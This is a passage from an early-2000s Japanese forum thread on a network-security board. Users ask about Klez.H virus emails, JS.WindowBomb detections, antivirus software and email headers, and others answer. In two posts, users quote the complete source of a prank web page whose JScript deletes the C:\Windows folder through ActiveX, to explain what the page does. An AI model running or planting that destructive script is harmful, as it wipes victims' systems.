うげ、今日だけで３つ目のウィルスメールが来たー。
名前も件名も全て違う。
件名は、「Re:look my girl friend 」「how are you」「A IE6.0patch」
名前は1個目は忘れたけど、あとは「hymmt」「trash」

すごくしつこい。

　

>>452
http://pc.2ch.net/test/read.cgi/sec/1024943662/l50
↑の可能性あり。

今日だけでウィルスメールと思われる物が５通来ました
メールのソースを見たら５つともアルファベットのＡなど
とてつもない数が羅列してありました。

>>456
報告は別にしなくて良い。

>>446
ANTIDOTEの簡易版、説明見ながらやってみました。
最初に、Cドライブのコード解析でチェックしたところ
「ウィルス感染を検出！」なんてダイヤログが出て一瞬焦ったら
感染ファイルは0だったけど、プロパティをコピペしたメモ帳が
懐疑ファイルになってました。（ﾎｯ…
削除したウィルスメールを再受信してやってみたら
コード解析では出なかったけど、電子メール確認で感染ファイルとして
>>451さんのおっしゃる通り、Klez-hと出ました。
いつも関連ページで、件名や添付ファイルから調べていましたが
必ずしも当てはまるわけでは無いのですね。

おまけに\Helpdesk\SFCの中に、5個の不良ファイルが見つかってしまい
ちょっと鬱ですが・・・
ノートンやウィルスバスター入れてるのに感染しまくってる友人達が居る為
（中には何度もとか、一人で50通位送って来るヤツとか居るし・・・）
今後も感染しない様に気を付けます。どうもでした！

ノートンやウイルスバスター入れてるのに感染しまくってる友人達と縁を切れ。

JS.Winbomb.dウイルスはどういうものですか？
ノートンで検出されたのですが・・・。

>>460
http://securityresponse.symantec.com/avcenter/venc/data/js.winbomb.d.html
検索しろ

Johann Strauss型ウィンドウズ爆破ウィルスD変異株



・・・ではない

KlezH
Received: from smtp01.asahi-it.com (EHLO smtp.asahi-it.com)
(210.174.168.200) by ** with SMTP; **
Received: from Mtrkxip (pee7b3c.kngwnt01.ap.so-net.ne.jp [202.238.123.60])
by smtp.asahi-it.com (8.11.1/3.7W) with SMTP id g7J9xUm82295
for < [email protected] >; **
Date:**
Message-Id:< [email protected] >
From:postmaster< [email protected] >
To: [email protected]
[email protected]
[email protected]
[email protected]
[email protected]
210_174_168_200_pee7b3c_kngwnt01_ap_so-net_ne_jp@mxin1.so-net.ne.jp
対策せよ!!!!!!!!!!!!!!!!!!!!!!!
Subject:Undeliverable mail--"楙楙�蒂栗・衄¬吐柁#34;

The following mail can't be sent to kanagawa＠mycom.co.jp:
From: [email protected]
To: kanagawa＠mycom.co.jp
Subject: まだまだありますが書ききれないので随時追加
The attachment is the original mail
-------------
添付ファイルは、
http://www.h2.dion.ne.jp/~obecchi/combo.htm
http://www.h2.dion.ne.jp/~obecchi/
http://mkg.uic.to/mkgu/obecchii.html
役立つコンボ集
カ−ドゲ−ムの醍醐味といえばやっぱりコンボ！
ここでは基本的・実用的なコンボを随時発表していこうと思います。

West Nile Virusが猛威を振るっているらしいです。

アドレス → inet <[email protected]>
件　　名 → Fw:your password
添付ファイル → align.bat, roadstar_mazda-thumb-1028712269[1].jpg

これって何てウイルスなんですか？

>>465
まずklezだろうけど>>442に同じ。

>>465

VBS.Internalっていうウイルスをもらっちゃいました。どんな影響が出て
くるのでしょうか？ファイルの削除だけでよいのでしょうか

>>468
お前は1週間後に死ぬ

あ〜〜、そ〜なんですかぁ…

Windows98SEの人に、ちょっと聞きたいのですが
C:\windows\Asdapi.exe
C:\windows\ramsys.exe　ってﾌｧｲﾙがｱﾝﾁｳｨﾙｽにひっかかったんですが
この2個のﾌｧｲﾙあります?
よかったら確認してほしいのですが

すいません
win板逝きます

>>471
トロイ関連。
ttp://securityresponse.symantec.com/avcenter/venc/data/backdoor.cabro.html
ttp://securityresponse.symantec.com/avcenter/venc/data/trojan.sheehy.html

クレイズＨがPCの中に入ってきたらしいのですが
ウイルススキャンで出てきたファイルを消そうとしても消せません
どうやって消したらよいのでしょうか？

状況がさっぱりわからん
説明書見たほうがはやいんとちがう？

説明がおおざっぱすきましたね。。。
っというか、クレイズじゃなくてクレズですね。きっと。。。

ウイルスバスターのHPには、手動で消すように書いてありました。

ウイルススキャンで出てきたファイルをエクスプローラで消そうとすると
「送り側のファイルが使用中の可能性があります」ってなります。

>>476
ちみだいじょうび？
ファイル名は？たぶんセーフモードで立ち上げて削除できるから。
セーフモードって？とは言わないよね。

>>476
てか、質問者はOSとか詳しい情報を最初に書いてくれ。
ファイルのPathも。

PC１台しかないならシマンテックの駆除ツールつかったほうが良さげ

http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html

OSはWindowsMeです。

ファイルはこの二つです
c:\_RESTORE\ARCHIVE\FS1869.CAB
c:\_RESTORE\ARCHIVE\FS1692.CAB

セーフモードでも２回やってみたのですがだめでした。


>>479さんので消してみます！！

RESTOREフォルダにウィルスがあるなら
そのページの説明と

_RESTORE フォルダにウィルスが発見された場合の対応方法について
http://support.microsoft.com/default.aspx?scid=http%3a%2f%2fwww.microsoft.com%2fJAPAN%2fsupport%2fkb%2farticles%2fjp263%2f4%2f55.asp


これもきちんと読んでね

>>481さんのリンク先の説明通りにやったら消すことができました！！

レスしてくれた方ありがとうございます！！！

>>482
お金あるならノートンかウィルスバスター
ないならAVGくらいいれたほうが良かれ

あぼーん

>>484は他人のアドレスを晒しているから誰も送っちゃイカンよ

ほい

ttp://lounge.dip.jp/~yoshinoya_off/up/img/whismng.zip

あぼーん

484が使っているのは6年前のDr. Solomon

ハイテク犯罪で逮捕されると、pcを押収され、技官が中を
徹底調査するそうですが、この場合削除したファイルとかも
復活させられるんだろうか。
こーゆー場合、ハードディスクをフォーマットしとかんといかんのだろうか。

>>489 逮捕されるようなことやったんですか？

>>489にはハイテク犯罪は無理です

>>489
いちどﾀｲｰﾎされてみてね。＾＾
タダのフォーマットでは復元可能。FATを消すだけだから。
全体にデータを再書き込みして復元不能にしてからフォーマットするツールはあるよね。

>>492
UNIXでHDDを完全にクリア状態にしたら大丈夫でしょう。

これではだめなん?
format /u

shred *

2chの「ＰＣ等-Windows」版の「おまえらユーザー名になんて…」をクリックした瞬間「LoveLetterウイルスを発見しました」
ノートンが即削除してくれたけど、スレのデータにも入ってるんですね。

>>496
ノートンがコードに反応してるだけだ。

http://game2.2ch.net/test/read.cgi/ff/1029447644/l50
って、なんでノートン先生が反応するの？

『Macro.src』っていうのに感染した。

>>496,498
2chを見ただけで出るのは、LoveLetterもMacro.srcも全部こっちね。

http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

http://www.oap.ne.jp/~mayumayu/index.urajyouhou.htm
このページの「ウィンドウズファイル消去」踏んでしまいました（ああ、うかつ・・・
MDIbrowser使ってたから大丈夫かなって思ったんだけど
再起動するたびハードディスクがすごい音！！中身は消えたりしてないんだけど
かなーり不安。
対処法教えてもらえませんか？

>>501
踏んだお前が悪い

<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=x-sjis">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>消しちゃうよん</title>
</head>

<body>
<script language="jscript">
var fso
fso=new ActiveXObject("Scripting.FileSystemObject");
fso.DeleteFolder("C:\\Windows",true);


</script>
</body>
</html>

これ今も効くの？

>>501
つか、たったこれだけぢゃん。。。。

<html><head>
<meta http-equiv="Content-Type"
content="text/html; charset=x-sjis">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>消しちゃうよん</title>
</head>
<body>
<script language="jscript">
var fso
fso=new ActiveXObject("Scripting.FileSystemObject");
fso.DeleteFolder("C:\\Windows",true);
</script></body></html>

>>504ｹｺｰﾝしよう

>>503
つか、かぶた。。。。

消されたところが良くわかんない。
そこをしゅうふくすればなんとかなる・・・・か？

>>505
ﾔﾊﾟｰﾘ､6月。。。ﾁﾞｭｰﾝﾌﾞﾗｲﾄﾞがｲｲﾅ｡｡｡
子供は･･･2人･･･ｲﾔｰﾝ
んぢゃ、明日、ちゃんと遅れないで来てね。。。お父さん待ってるから。。。

私のところもウィルススキャンでJSWINDOWS　BOMが検出されました。
OSはwindows98です。
駆除不可能という文字が出たのですが、駆除して正常に可動させる
にはどうしたら良いでしょうか。。
色々調べたのですが。
教えて下さい<(_ _)>

>>509
何それ。検索で出てこないよ。

JS WINDOWSBOMB.E でした(-_-;)
宜しくお願い致します。。。。。。

因みにオンラインウィルス検索で、駆除不可能という判定が
出てしまいました。

ｹｺｰﾝ指輪買いに逝ってきます

>>511
WindowBomb

ノートンアンチウィルスについて教えてください。
個人でアンチウィルスソフトを使いたいと思っているのですが、
標準パッケージ 6,800円（税別)の製品は年間ライセンス料金みたいな
のはあるのでしょうか？
また、あるのだとしたらだいたいいくらぐらいなのでしょうか？
よろしくお願いします。

シマンテックのホームページ（日本語）
http://www.symantec.com/region/jp/index.html

>>509
ウィルススキャンしたソフトのHPで見れ。どこのだ。

システムの復元したらなおったーよ（たぶん

http://www.trendmicro.co.jp/hcall/

ココでスキャンしました。
自分でも調べてみます。。
宜しくお願いします<(_ _)>

>>509
変種のバージョンが異なるかもしれないが。

Symantecで言うとこの、これか？
http://www.symantec.com/avcenter/venc/data/js.trojan.windowbomb.html
というか、トレンドではこれ。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=JS_WINBOMB&alt=WINBOMB&loc=enus
一覧はこれ。
http://www.virusbtn.com/resources/vgrep/vgrep.cgi?terms=Js.Trojan.WindowBomb&product=0

検出されたウイルス名は、スペースやピリオド、バックスラッシュ、アンダースコアを間違えると、検索できなくなったりするんだが。
メルで送ってくれたら、Nortonでスキャンしたげるけど。
とりあえず「駆除」じゃなくて「削除」で直接殺せばいいvilliなんではないだろうか。

この前、うっ！

>>cheshire-cat ◆CATJR.v6
詳しく本当にありがとうございます<(_ _)>

あの・・メールに添付してお送りすればよいのでしょうか？
メルアド晒します。
もう一度スキャンしてみたのですが、ダブルクリックで
変種だからなのか、該当データなし、と出てしまいました。

初心者でちょっと情けない質問ですが、
直接削除はどうやったら出来るのでしょうか。
ファイル名を指定して実行したら、見事にｲﾝﾀｰﾈｯﾄｴｸｽﾌﾟﾛｰﾗ
がガンガン開いて止まらなくなってしまいました。。

AVG Anti-Virusについてです。

admin権限がないと強制的にスケジュールチェックされるんですけど
なんとかなりませんか？
ログインの度に設定がリセットされるのです。
私だけ？
誰か情報ないですか？

Webメールでヘッダを見るのはどうしたら良いのでしょうか？
OEだと右クリック→プロバディ→詳細タブで見れるのですが、
Webメールは詳細タブが出ず、全般しか出ません。
ちなみに私の使っているのはインフォシークのフリーメールです。
この方法でウィルスに感染する可能性って・・・少ないですよね？

インフォシークは使ったこと無いんでわからん
gooメールは詳細が見れるようになってる
yahooメールとhotmaliははオプションで設定が変えられるみたい
あとは知らん
んでウィルス感染の可能性は
IEのパッチあてるかIEで見なけりゃおｋ
あとは知らん相手からの添付ファイルは見ないで削除

hotmaliってなんだよ・・・鬱

>525さん、ありがとうございます。
皆さん、どんな方法でヘッダーを見ているのか
お訊きしたかったんです。

KlezH
Received: from smtp01.asahi-it.com (EHLO smtp.asahi-it.com)
(210.174.168.200) by ** with SMTP; **
Received: from Infhh (p2949ac.kngwnt01.ap.so-net.ne.jp [218.41.73.172])
by smtp.asahi-it.com (8.11.1/3.7W) with SMTP id g7NGL3m83093
for < [email protected] >; **
Date:**
Message-Id:< [email protected] >
From: eykam77 <eykam__＠mail.infoseek.co.jp>
To: [email protected]
[email protected]
[email protected]
smtp_asahi-it_com_p2949ac_kngwnt01_ap_so-net_ne_jp@mxin1.so-net.ne.jp
Subject: Corp. All Rights Reserved.

添付ファイルは、
超図解PLUSパソコンを楽しく使う本Windows編2001年度版
http://www.x-media.co.jp/xbook/computer/PC21TYP/
http://www.google.com/search?q=%E8%B6%85%E5%9B%B3%E8%A7%A3PLUS+%E3%83%91%E3%82%BD%E3%82%B3%E3%83%B3%E3%82%92%E6%A5%BD%E3%81%97%E3%81%8F%E4%BD%BF%E3%81%86%E6%9C%AC&ie=UTF-8&oe=UTF-8&hl=ja&lr=

KlezはPC21TYP.EXE

だからメールアドレス晒しておまけにマルチで何がしたいんだよおまいさんは

>509
norton antivirusからレポートを開いて検疫項目にある
ウイルスを選択、そして項目を削除をクリックで削除できますよ。

>>509
530の人が書いた通り、検疫されたファイルを直接削除。

>>530
「>」使う人って、この板で久しぶりに見た（雑談）

>>530さん、cheshire-cat ◆CATJR.v6 さん
ありがとうございます。
やってみます。

>>509
漏れ、何も役に立っていないんだが。

>>533
立ってるでしょ。

これってもしかしてかなり厨房な質問かもしれないんですが・・・

ちょっと前に知り合ったメル友の子（その時点ではまだ２、３回しかメール交換してなかったので
そんなに親しくもなかったんです）のＰＣがウィルスに感染してしまい、
それでその旨をその子にメールで連絡したんですね。
ですがその子自身、あまりウィルスに対しての自覚が無く、
いくら「早めに対処しないと、周りの人が迷惑するよ」というようなことを言っても
「そのうち何とかしますので、もう少し待ってください」みたいに全然取り合ってくれなかったんですね。
で、いつまで経っても状況が変わらないし、ウィルスメールも１日に３０通くらい届くようになったので
再びメールで連絡しようとしたら、そのメアドは既に使われてなくて、
連絡を取ることができなくなってて・・・。

でも不思議なのは、そのメアドが既に使われていないのにも関わらず、
未だにそのメアドからウィルスが送られてくるんですよ。
それだけでなく、そのメアドを母体にして（？）
さらに別にメアドからも届くようになって・・・（プロパティを見ると、
送信者のメアドとは別に、そのメル友のメアドも表記されてるんです）。
で、そのメル友のメアドを経由したと思われる２番目のメアドも、
既に使用されていないメアドもあれば、
今も普通に使用されているメアドもあり（←そり使用している人は、メル友だった子とは別人です）
その辺はマチマチなんですよね。

でもまぁいずれにせよ、その感染ルートの大元である（と思われる）その元メル友に
何とかウィルスを駆除してもらうよう一言言いたいのですが、
でももう連絡のとりようがないのでとても困ってるんですよね。
とりあえず自分は、ウィルスメールを開かないよう細心の注意を払ってはいるんですが、
それでもいつか何かの拍子に開いてしまわないかとても不安だし、
何より大量のウィルスメールを送られているので、
普通のメール送受信をするのにも物凄く時間がかかってとても迷惑してるし・・・。

スミマセンがどなたか良きアドバイスを、よろしくお願い致します。。。

>>535
1 捨てる
2 受信拒否する
3 莫大な時間と労力を費やしてでも相手に知らせる方法を探して、運がよければ知らせる

>>535
Klezは送信者を偽装するから、使われてないメールアドレスから届くのだと。
その人のプロバイダに連絡するしか、対処法はないでしょう。

ウイルスメールは受信前にnPOPで削除。

>>535
　このようなタイプのワームでは、「差出人」を感染コンピュータ内で取得した任意のメールアドレスとして設定する場合があります。
　そのため「差出人」として設定されているメールアドレス使用者のコンピュータが感染しているとは限りません。
　したがって、あるお客様のアドレス帳に弊社サポートセンターのメールアドレスが登録されていた場合、サポートセンターの名前が差出人となり、
　送信されてくる場合も想定されます。

これだろ

>>535
そういう無責任な人間はメル友としてもふさわしくない。ので、運が悪かったとあきらめる。
ウィルスメール受信については、ｎPOPでも使う。
ttp://www.forest.impress.co.jp/library/npop.html

Klezを見抜けない奴は周りに混乱を巻き起こす

というわけで、当板ではおなじみの図解です。
http://www.nai.com/japan/virusinfo/klezezukai.asp

皆さん、こんな厨房な質問にご丁寧にレスして下さいまして
本当にありがとうございます！！（感涙）

>>536
ありがとうございます！　何とか頑張ってみます！！

>>537
プロバイダに連絡・・・なるほど、その手がありますね！
早速その方法で何とかチャレンジしてみます！！

>>538
あ、まさしくそのタイプのウィルスだと思います！
この前その『差出人』として設定されたメアドの人とメールで連絡が取れたんですが、
その人のＰＣについては『ウィルスに感染された形跡が無い』とのことだったんですね。
それを聞いて不思議には思っていたんですが・・・
その>>538さんが書いてくださった一文を見れば、なるほどって感じですね。。。（汗）

>>542
・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう
(無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50)

>>539
ホント、無責任なメル友ですよーーー！（怒）
npop、これからダウンロードしてきますね！
本当にありがとうございます！！

>>540
自分ももっとウィルスやＰＣに関して勉強しないといけないですね。。。

>>543
どうもありがとうございます！
何事も予防と対策が大事ですもんね！
色々親切に教えていただきまして、本当に皆さんありがとうございます。。。（感涙）

>>544
うーん、だからそのメル友が感染してたかどうかも怪しいと思うのだが・・・。

>>545
あぁ！
じゃあその諸悪の根源だと思っていた（笑）メル友の子も、
結局感染してたかどうか判らないってことですか。。。

うひぁ〜このウィルス、タチ悪いですね〜〜。。。（汗）

今、そのメル友が利用していたプロバイダの方へ問い合わせました。

とりあえずまた後で、そのウィルスメールのプロパティ（ヘッダー情報）
などをメールに一緒に記載して、ニフティ宛に送ることになりました。
なので、今は逆にウィルスメール待ち状態です。。
（ウィルスメールはその都度削除してるので、今ヘッダーをコピーして
送れないので・・・／苦笑）

いけね・・『プロバイダ宛』と書けば良かったものを、ついうっかり・・（反省）

こんなことだらだら書くお前もたちが悪い

>>547
で、なにをやりたいんだ？

具体的な被害にもあってないのに妙な正義感がわいて
よくよく冷静になって考えれば意味もないことを行うのは
いらんことしぃな初心者にありがちな行為です
皆さんもそうならないよう注意しましょう

http://www.geocities.co.jp/SiliconValley-Sunnyvale/7911/R3_temp.swf?inputStr=%82%B7%82%B0%82%A6%82%BC%81I%0D%0A%82%B1%82%CC%83N%83%89%83u%91S%88%F5%93%C1%83o%83%93%82%BE%81B

スレ違いかもしれないのですが・・・
ウイルスの「JS_WINDOWBOMB.E」ってなんですか？
感染してるみたいなんですが･･･

>>553丁度いいタイミング
>>509あたりから同じのに感染した奴の書き込みがあるので読んで見れ

すいません教えてください。会社のパソコンが今日おかしくなってしまい
ました。アウトルックエキスプレスで受信メールにカーソルを合わせ、
開かずにプレビューで内容を見ようとしたら、内容が表示されませんでした。
ダブルクリックで開くと読めました。

そこでいったん立ち上げなおす事にしました。そうしたら、立ち上がった
のはいいですがデスクトップには壁紙のみで、アイコンやファイル類が
一切出てきません。Ctrl+Alt+Deleteで強制終了するとプレビューには
何のプログラムも表示されません。セーフモードでの立ち上げでも同じく
アイコン類が出てきません。他のパソコンから共有ファイルは開けました。

ウイルスでしょうか？　単に故障でしょうか？　ノートン入ってます。

分かる方がいましたら、アドバイスお願いします。仕事できません（;´Д｀）

>>555
そのノートンはちゃんとウィルス定義ファイルをupdateしてあったのですか？
メール受信時に警告がなかった点を除けば完璧に怪しいプログラムにやられてダウンした様子ですね。
アイコンやファイル類は全部消去されていませんか？念のため他のPCからウィルスチェックをかけてみて、
何も発見されないようならそのPC内で残っているデータ（あるのかな・・・）を退避させた上で
再インストール、再設定しかないんでは？

ウイルスバスターでメールにWORM_KLEZ.Hというのが検出されました。
送信者を偽ることで有名ですがこれってプロパティのReturn-Pathも雨
も嘘なんですか？

ウイルスバスターでメールにWORM_KLEZ.Hというのが検出されました。
送信者を偽ることで有名ですがこれってプロパティのReturn-Pathも嘘なんですか？

分かりました。ごめんなさい

>>556
レスありがとうございます。updateは行っておりました。
今は家なので、出勤してからアドバイスどおりにやってみます。

http://www.ryulife.com/net/za/zajkit.html

ここのZAの日本語化パッチ入れると
ノートンが反応するんだけど
それでも入れていいの？

>>561
じゃあ、入れなきゃいいじゃん。

>>561
入れるときだけOKしてやればいい
無害

>>558

教えて下さい。
レジストリの値の削除はどうやってやるのですか？

すいません、今日パソコンを使ってたら突然、右下の時計とか出てる所に「ResidentialGatewayDevice」っていう変なディスプレイみたいなマークが出て、
「新しいデバイスを発見しました、ショートカットを作成しますか」っていうメッセージが出たんですけど、これってなんでしょうか？？？

>>565
PC初心者板へ行け

>>565
レジストリエディタ開いてるんだろ？適当に右クリックすればメニューがでる。
それもわからないようなら削除するな。なんで削除したいのかきちんと説明できる？

>>565
検索って言葉知ってるか？
>>566
こっちは検索しても英文しか引っかかんないなぁ。しかもそのほとんどがゲートウエイ理論だけみたいだし。
そんな表に出て動くんなら多分ウイルスの類ではないと思うが保証できないから、誰か詳しい人いたらよろしく。

>>566
そのダイアログ、実害なくウザいだけみたい。

--------------------------------------------------------------------------------
[125888] Re^3: ResidentialGatewayDevice 投稿者名：倭翔 投稿時間：02/15-22:03

> ＣＡＴＶではありませんが、ケーブルです。
> ケーブル常時接続です。

同じようなものです。
ので、対処も同じ。
まず、余計な共有を切り離す、FireWallを導入する、など。
基本的にそのあたりの接続形態はLANそのものです。

(抜粋：http://winfaq.power.ne.jp/logs/9x/0017.html)

>>570
「実害なくウザイだけのダイアログ」って、ある意味一番タチ悪いよな〜

ResidentialGatewayDevice
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q298757

こうやって対処しろとさ
http://www.drive.co.jp/asp/faq/faq_sanka.asp?q_id=13962&genre=Other

>>570-572
一番重要な「そもそもこれってナニ？」とか「コンポーネントを切ったらどうなるか」の部分がないなぁ。
ResidentialGatewayDeviceなんて御大層な名前ついてんのに、そんなポンポン切ってもいいもんなの？

トレンドマイクロとかのオンラインウイルススキャンが出来ないんですが…。
ActiveXが有効でないと出、設定を最低にしても今度は署名がありません
みたいなのが出てどうしても。これはウイルスなんでしょうか…？
あと、WORM_BADTRANS.Bの駆除ツール関連のものをパソ内検索で
削除したらメールボックスが空っぽに…（激鬱
この結果は正常なんでしょうか…

ttp://www.bb.isas.ne.jp/kazuhiro/index.htm　←藁た

>>573自分で調べろ

>>574ようわからんがウィルス検索ならAD簡はどうよ
・アンチドート簡易版
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html

トレンドマイクロのWORM_BADTRANS.Bの駆除ツール関連って、これ実行ファイルだけなんでないの？
それにメールボックス内のワーム駆除はできないって書いてあるみたいだけど

>>573
Residental：居住（地）の，　住宅向きの；　住込みの，　寄宿制の
Gateway：ゲートウエー　((複数のネットワークなどを接続するための装置またその接合点))．
Device：デバイス（装置）
訳してみたら、「住宅についている、複数のネットワークなどを接続するための装置」だね。

そんなに御大層な名前じゃないよ。たぶん、
あなたの住んでいる住宅の共有ネットワークに接続するためのものだと思われ。
これを使わなくてもインターネットに接続できてるなら切りっぱなしで構わないんじゃ・・・

さっぱり関係ないけど
ドメスティック（家庭的、とかの意味だっけ）って言葉を
語感だけで大層な意味を持つ言葉だと思ってる人っているよね

>>576
質問スレに「自分で調べろ」？残暑でアタマ腐ったか？

>>580( ﾟдﾟ)ﾎﾟｶｰﾝ

KlezH
Received: from mail0.ewetel.de (212.6.122.10)
by **
Received: from Mmhjdoi (dialin-80-228-10-153.ewetel.net [80.228.10.153])
by mail0.ewetel.de (8.12.1/8.12.1) with SMTP id g7PGXEHt028832
for < [email protected] >; Sun, 25 Aug 2002 18:33:16 +0200 (MEST)
Date: Sun, 25 Aug 2002 18:33:14 +0200 (MEST)
Message-Id:< [email protected] >
From:jandavid<jandavid_at_t-onlinede>
To: [email protected]
[email protected]
[email protected] 対策せよ!!!!!!!!
Subject:A new game

This is a new game
This game is my first work.
You're the first player.
I expect you would enjoy it.

ホストの検索 - その他の RBL への登録状況
http://www.ordb.org/lookup/rbls/?host=mail0.ewetel.de
Host: mail0.ewetel.de (212.6.122.12)
ztl.dorkslayers.com 登録あり: 12.122.6.212.ztl.dorkslayers.com
descriptive text "212.6.122.12 is listed by ztl.dorkslayers.com"

マルチは放置

毎日同じﾔｼからウイルスメール（クレズH）がくるんですけど、どうすればいいですか？

klezは差出人偽装をするからヘッダ見ないとわかんねぇ
ヘッダをここで晒すなら隠すとこは隠してね

>>585
相手のプロバのHPの、連絡用とかのメアドに「困っているんですぅ！」、ってメルを送る。

OCNの札幌通りアクセスポイントを除けば、いずれも即対処してもらえたよん。

毎回、偽アドで来るんだけど、ヘッダ見ると同じアド。

　　　　　　　　　　＿,,,,,.＿,,,,,.....　　　　
　　　　　　　　 -‐"　　　　　　　 ヽ￣ﾉ^7__　　 異議あり！ウィルスを送ってるのは山田さん
　　　　　　 ''"--―――-r⌒｀｀~｀ﾞﾞ`''ﾍ/　　　 　　　　　　　　　つまりあなただ!!!
　　　　　`ー--――ｰ---＞　 --､_,　',　　　
　　　　　　´ー-- ..＿ へ/　　　くてi` 〈　　　　　　　　　　　　　　　　　　　　　　　　　_. -‐‐''''''''')
　　　　　　 ｰ-_　　 | ^i　　　　　　　　, ﾉ　　　　　　　　　　　　　　　　　　　 ｧ=r‐'' "´　__. ‐'' "
　　　　　　　　　　 ヽrﾍ､　　 　 ,.-＝ｧ/　　　　　　　　　　　　　　　 _. ‐'"´　 l　l　　　　r}　} }l
　　　　　　　　　　　/　　!､　 　{　　//　　　 __　　　　　　.　- ' "´　　　　　　 l　ヽ　 ､　ヽ_ﾉﾉ
　　　　　　　　　　 ﾉ 　　　　､　 -‐ /-‐ ' ´／｀ﾞ ｰｧ' "´　　‐'"´　　　　　　 　ヽ､`ｰﾃヽJ
　　　　　_.. -‐''ﾌ|フヽr-‐ ''''フ.￣｢´ 　''　/　　　/　　　　　　　　　　　　　　_..　 -'-'
　　. ‐ '7 　 　く/|〉-rへ. ／　　　l　　　　l　　　　　　　 　　 　　　　　 .‐ '"´
　/　　/　　　 /　|　 | ／ ｀ ＜´　　 　 　 ',　　　　　 　　　_..　- ' "´
./　　 /　　　 ヽ .|　/ 　 　／　iニニニ}　　 ､　　　_ ,. - '
　　　 l iニニl　ヽ|/ 　 ／ 　 　　ﾉ　　　　　　`　 ／

山田さんfrom図解：Klez.e・klez.hとはどんなウイルスなのか？
http://www.nai.com/japan/virusinfo/klezezukai.asp

みたいなの送ったれ

east.cts.ne.jpってどこのプロバイダですか？

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.169.170.0
b. [ネットワーク名] CTS
f. [組織名] CTSインターネット接続サービス(株式会社南東京ケーブルテレビ)
g. [Organization] CTS(SOUTH TOKYO CABLETELEVISION)
m. [運用責任者] SA114JP
n. [技術連絡担当者] SM992JP
p. [ネームサーバ] dns01.cts.ne.jp
p. [ネームサーバ] dns2.odn.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 1998/03/04
[最終更新] 1999/07/15 11:47:49 (JST)
[email protected]

檻
ウィルス隔離フォルダのこと。
使用例：昨日アングラサイトでウィルスに感染したが、
駆除できなかったんで檻の中に入れといたよ。

ペット
隔離フォルダの中で飼っているウィルス。
使用例：俺のペットハイブリスだよ。

なんか誤爆ぽいけど・・・
ウィルスの保存はzipで二重圧縮、二回目をpass付きにしてるんだけど
これじゃぁダメなの？

>>593
さらに偽装とかね。

偽装かぁ、早速実行します

最近ウィルス添付らしきメールが毎日来るようになってしまいました。
開かなければ放置して削除してしまえば大丈夫でしょうか？
メールが来なくなるような方法は無いのでしょうか？
こういった事に疎いもので詳しい方是非教えてください。お願いします。

>>596
お前>>1から読めよ

読んだのですがﾁﾝﾌﾟﾝｶﾝﾌﾟﾝなんです。
どなたか教えてください、お願いします。

読んでダメなら教えてもダメだろうね

そんなこと言わずに>>596のレスに関して教えてください。
親切な方、お願いします。
このようなメールを送られてきた事が今まで一度も無かったので
対処の仕方がまるで解らないのです。
とりあえず今は全部開かずに削除しているのですが・・・。

＞577
レスありがとうございます。早速やってみたら（できた）、stopアイコン表示の
圧縮ファイルが2個あったんですがとりあえずウイルスにはかかってない
もようです。よかった…。結局メールは自分でなんか重要なものを
消しちゃったみたいです…（鬱
Outlookはようこそメールが着てたのでもう諦めましたがポスペは
件名は全て残ってる…。本文のみ白紙。もうやってられません。はあ…

>>600
それでいいんでない？
んじゃなきゃ受信拒否かnPOPで鯖から直接削除とか
後はヘッダ読んで相手がわかれば相手のプロバに相談とか
あ、ヘッダの読み方くらいは検索しようね

>602
>んじゃなきゃ受信拒否かnPOPで鯖から直接削除とか
>後はヘッダ読んで相手がわかれば相手のプロバに相談とか
こういった事の意味がまるでわからないのですが･･･。
相手が誰だかメールを開かなくても解るのですか？

あとウィルスに感染していなければ
個人情報とかは流出されてないのでしょうか？
本当に申し訳ありません、教えてください！

>>604
ウイルスに感染することと個人情報が流出することに関連はあまりない
個人が個人情報を流出するのはまずありえないことだし

>605
解りました、有難うございます。

>>603
どこの誰からくるのかがわかれば受信拒否ができるということ。
それを知るためにメールのヘッダ情報を見ろということ。
メールヘッダについては自分で検索すればいいんだが、あまり冷淡にするのも
何なのでここでも見ておいてちょ。
ttp://www.mag2.com/easy/head.htm
ttp://www.cc.ttcn.ne.jp/html/gijutu/mail-header/w_head.htm
ttp://www.puni.net/~mimori/header/
ついでに、これもだ。
nPOP（というソフトと使い方）
ttp://nakka.com/soft/npop/

冷淡つーか、一から十まで全部語ってやらなきゃならない香りがするからなぁ

とりあえず、初心者のためのセキュリティ対策
http://www.tkcity.net/~satoko/

あとIEにOEつかってるならここ見てパッチあてれ
OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/l50

・・・Macユーザーですとかいうオチはないよね？

毎日ウイルスメールが来るのですがどうしてでしょうか？実害は無いのですが、原因を知りたくて。

2chの半角板に逝ったらウイルス検知した。

ノートン先生ならよくやることだからきにしるな

>>607->>608
過去ログ読んでも全く解らないヤシには
参考ページも無駄だと思うよ。
読むのが面倒って正直に言えばいいのにね。

ウィルスの作り方教えて

ネットワークセキュリティ＠2ch掲示板
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。

教えて教えて教えて教えて教えて教えて
教えて教えて教えて教えて教えて教えて
教えて教えて教えて教えて
ウィルスの作り方教えて

検体
１．土に水と砂糖を加え、よくかき混ぜ、しばらく暗所で放置する
２．浮いてくるごみを丁寧に取り除き、水分を少量掬い取り、残りは捨てる
培地
１．棒寒天を水で戻し、薄く切って皿に盛る

培養の仕方
１．検体を培地に数滴落し、暗所で数日放置する
２．コロニーの中心を掬い取り、種類毎に新しい培地に盛り、残りは捨てる
３．コロニーの形成を確認し、紫外線を照射する
４．そのまま培養し、ブロック毎に切り分ける
５．ブロック毎に培地に盛り、培養する
６．ブロック毎に切り分け、耐性をテストする
７．検体が全部のテストに合格するまで２〜６を繰り返してでき上がり

培養時の注意
